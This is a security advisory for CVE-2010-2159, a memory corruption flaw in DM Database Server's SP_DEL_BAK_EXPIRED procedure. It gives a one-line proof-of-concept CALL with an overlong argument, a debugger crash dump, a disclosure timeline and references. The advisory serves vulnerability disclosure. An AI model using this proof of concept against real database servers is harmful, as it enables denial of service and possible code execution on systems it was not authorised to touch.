DM Database Server Memory Corruption Vulnerability

2010.06.12
Credit: wsn1983
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2010-2159
CWE: CWE-119


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

DM Database Server Memory Corruption Vulnerability Vulnerable: All Version Vendor: www.dameng.com Discovered by: Shennan Wang (HuaweiSymantec SRT) Details: ========= A vulnerability in DM Database Server all version allows attacker to execute arbitrary code or cause a DoS (Denial of Service).Authentication is required to exploit this vulnerability. The specific flaw exists within the SP_DEL_BAK_EXPIRED procedure. POC: ========= CALL SP_DEL_BAK_EXPIRED('AAAAAAAAAAAAAAAAAAAA', ''); (458.5fc): Access violation - code c0000005 (!!! second chance !!!) eax=00000000 ebx=02d3d430 ecx=ffffffff edx=074ecfd0 esi=074ed37c edi=0000041c eip=100d1753 esp=074eccec ebp=074ed1fc iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 *** WARNING: Unable to verify checksum for C:\dmdbms\bin\wdm_dll.dll *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\dmdbms\bin\wdm_dll.dll - wdm_dll+0xd1753: 100d1753 f2ae repne scas byte ptr es:[edi] 0:009> da ebp 074ed1fc "AAAAAAAAAAAAAAAAAAAA" Timeline: ======== 2010.04.17 Report to vendor,no response. 2010.05.31 Public

References:

http://xforce.iss.net/xforce/xfdb/59081
http://www.securityfocus.com/bid/40460
http://www.securityfocus.com/archive/1/archive/1/511559/100/0/threaded


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top